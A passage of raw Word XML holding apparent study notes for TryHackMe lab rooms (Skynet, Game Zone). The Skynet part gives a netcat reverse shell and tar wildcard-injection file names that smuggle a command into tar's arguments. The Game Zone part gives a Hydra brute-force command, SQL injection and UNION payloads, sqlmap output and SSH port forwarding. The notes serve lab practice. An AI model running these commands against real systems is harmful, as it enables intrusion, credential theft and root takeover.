          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo "/var/www/html"  &gt; --checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF5205" w14:textId="4291C3B8" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wait until cronjob completed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0E3884" w14:textId="12F8FDC4" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752BF336" w14:textId="4E43341A" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>capture root flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591BB31" w14:textId="19A173C8" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A87F374" w14:textId="77777777" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc &lt;your ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9365FC" w14:textId="77777777" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1234 &gt;/tmp/f" &gt; shell.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC3AE7" w14:textId="77777777" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E38D21" w14:textId="0332B2A6" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>touch "/var/www/html/--checkpoint=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC3EAE" w14:textId="18D6D728" w:rsidR="008E503B" w:rsidRDefault="008E503B" w:rsidP="008E503B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nc -lvnp &lt;port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0508D209" w14:textId="7B2FB7B9" w:rsidR="00180223" w:rsidRDefault="00180223" w:rsidP="00180223">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A836CE" w14:textId="55F77692" w:rsidR="00180223" w:rsidRDefault="00180223" w:rsidP="00180223">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>capture root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118C900A" w14:textId="0F2B9112" w:rsidR="00036D8C" w:rsidRDefault="007A6E65" w:rsidP="00036D8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId240" w:history="1">
        <w:r w:rsidR="00036D8C" w:rsidRPr="00916B16">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Kahvi-0/Writeups/blob/master/TryHackMe/Skynet.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C1C5FDA" w14:textId="17CBB5AC" w:rsidR="00036D8C" w:rsidRDefault="007A6E65" w:rsidP="00036D8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId241" w:history="1">
        <w:r w:rsidR="00036D8C" w:rsidRPr="00916B16">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.tryhackme.com/skynet-writeup/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F7B34A4" w14:textId="57E72E3B" w:rsidR="00036D8C" w:rsidRDefault="007A6E65" w:rsidP="00036D8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId242" w:history="1">
        <w:r w:rsidR="00036D8C" w:rsidRPr="00916B16">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=HXikLrFVIXc&amp;t=2416s</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35075F51" w14:textId="5269FDBD" w:rsidR="00036D8C" w:rsidRDefault="007A6E65" w:rsidP="00036D8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId243" w:history="1">
        <w:r w:rsidR="00036D8C" w:rsidRPr="00916B16">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.hackingarticles.in/command-shell-to-meterpreter/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15E47DFB" w14:textId="49235C19" w:rsidR="00180223" w:rsidRDefault="00180223" w:rsidP="00180223">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514A89D5" w14:textId="50C18267" w:rsidR="00180223" w:rsidRDefault="004B1E51" w:rsidP="00180223">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Game Zone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4964A" w14:textId="35AB5971" w:rsidR="004B1E51" w:rsidRDefault="00D4574D" w:rsidP="004B1E51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D0379" w14:textId="7428738E" w:rsidR="00D4574D" w:rsidRDefault="008064D4" w:rsidP="00D4574D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE610A9" w14:textId="241F8561" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="00D4574D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>determine if page runs php by adding index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684C9F65" w14:textId="75A4D7B3" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>login page php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3E576" w14:textId="60E91CEB" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00420DB3">
        <w:t>username=d&amp;password=d&amp;x=30&amp;y=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2A03F" w14:textId="07B13B06" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353215C5" w14:textId="366C16D2" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB43FDE" w14:textId="0D8FF2DE" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>BurpSuite Intercept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6664F0F5" w14:textId="0CD787E8" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>grab POST form delimiters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43857D83" w14:textId="199C332E" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>HYDRA to Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18643D76" w14:textId="0B74BF42" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00420DB3">
        <w:t>hydra -L SQL.txt -p pass 10.10.192.4 http-post-form “/index.php:username=^USER^&amp;password=^PASS^&amp;x=30&amp;y=:Incorrect Login” -f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65690082" w14:textId="5C4CB4F8" w:rsidR="00420DB3" w:rsidRDefault="007A6E65" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId244" w:history="1">
        <w:r w:rsidR="00420DB3" w:rsidRPr="004567AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/xmendez/wfuzz/blob/master/wordlist/Injections/SQL.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43E148E0" w14:textId="7CD7073A" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Return credentials for login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D47F6" w14:textId="5463317D" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>repeat SQLi detection and exploitation process in search bars by first using single apostrophe to confirm vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0141AC41" w14:textId="3DB27EDA" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B94C63" w14:textId="774C16A5" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>admin’ OR 1=1 - -  -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0DA616" w14:textId="384C826B" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>admin ‘ or 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130F19D" w14:textId="3F230AD0" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ORDER BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E62B2A4" w14:textId="37C31772" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>searchitem=test’ ORDER BY 3-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52673533" w14:textId="7C6E5DD3" w:rsidR="008064D4" w:rsidRDefault="008064D4" w:rsidP="008064D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>searchitem=test’ UNION SELECT 1,2,3-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31126A8E" w14:textId="055436A6" w:rsidR="00420DB3" w:rsidRDefault="00420DB3" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘ union select 1,2, schema_name FROM information_schema.schemata; — -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC14424" w14:textId="0D5C8F47" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00420DB3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>‘ union select 1,2, TABLE_NAME FROM information_schema.TABLES WHERE table_schema=’&lt;DB name&gt;’; — -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F13DD5" w14:textId="2F95731E" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for login credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136E1028" w14:textId="432E9DAA" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>such as PWD files for SSH login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E635E8B" w14:textId="7E3E848E" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>crack password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F702742" w14:textId="65B581D8" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEB4BD6" w14:textId="77777777" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap resumed the following injection point(s) from stored session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC92A6E" w14:textId="77777777" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DA810" w14:textId="77777777" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Parameter: searchitem (POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D52914" w14:textId="77777777" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Type: UNION query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95D81B" w14:textId="77777777" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Title: Generic UNION query (NULL) - 3 columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F43178D" w14:textId="4B5D06E0" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Payload: searchitem=test' UNION ALL SELECT NULL,NULL,CONCAT(0x71787a7171,0x654a55516342637965547842506b644e7a43565354614c63756f4368676e70434165736969574c4a,0x7162716a71)-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADD9445" w14:textId="121FB629" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Post-Penetration Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659BEECD" w14:textId="0226C70D" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>netstat -nutlp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AEF8B1" w14:textId="52D108FC" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B055FB" w14:textId="391AAA80" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>curl 127.0.0.1:&lt;port of interest&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0BBB81" w14:textId="1C32A564" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>verify intranet access to firewall blocked ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFBC60" w14:textId="4A321D10" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ps aux | grep -I “server name”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91BF48" w14:textId="7327F1EA" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSH port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E788ABA" w14:textId="05648553" w:rsidR="00674C76" w:rsidRDefault="00674C76" w:rsidP="00674C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ssh -L &lt;port</w:t>
      </w:r>
      <w:r w:rsidR="00E57FF8">
        <w:t>&gt;:127.0.0.1:&lt;port&gt; -f -N &lt;username&gt;@&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B63EA" w14:textId="2D0AA966" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>local tunnel via SSH to forward the port from the remote machine to attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D118B45" w14:textId="00C4D41C" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E57FF8">
        <w:t xml:space="preserve">    ssh -L 10000:localhost:10000 </w:t>
      </w:r>
      <w:hyperlink r:id="rId245" w:history="1">
        <w:r w:rsidRPr="004567AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>agent47@10.10.192.4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AC9D7D1" w14:textId="6504AF72" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
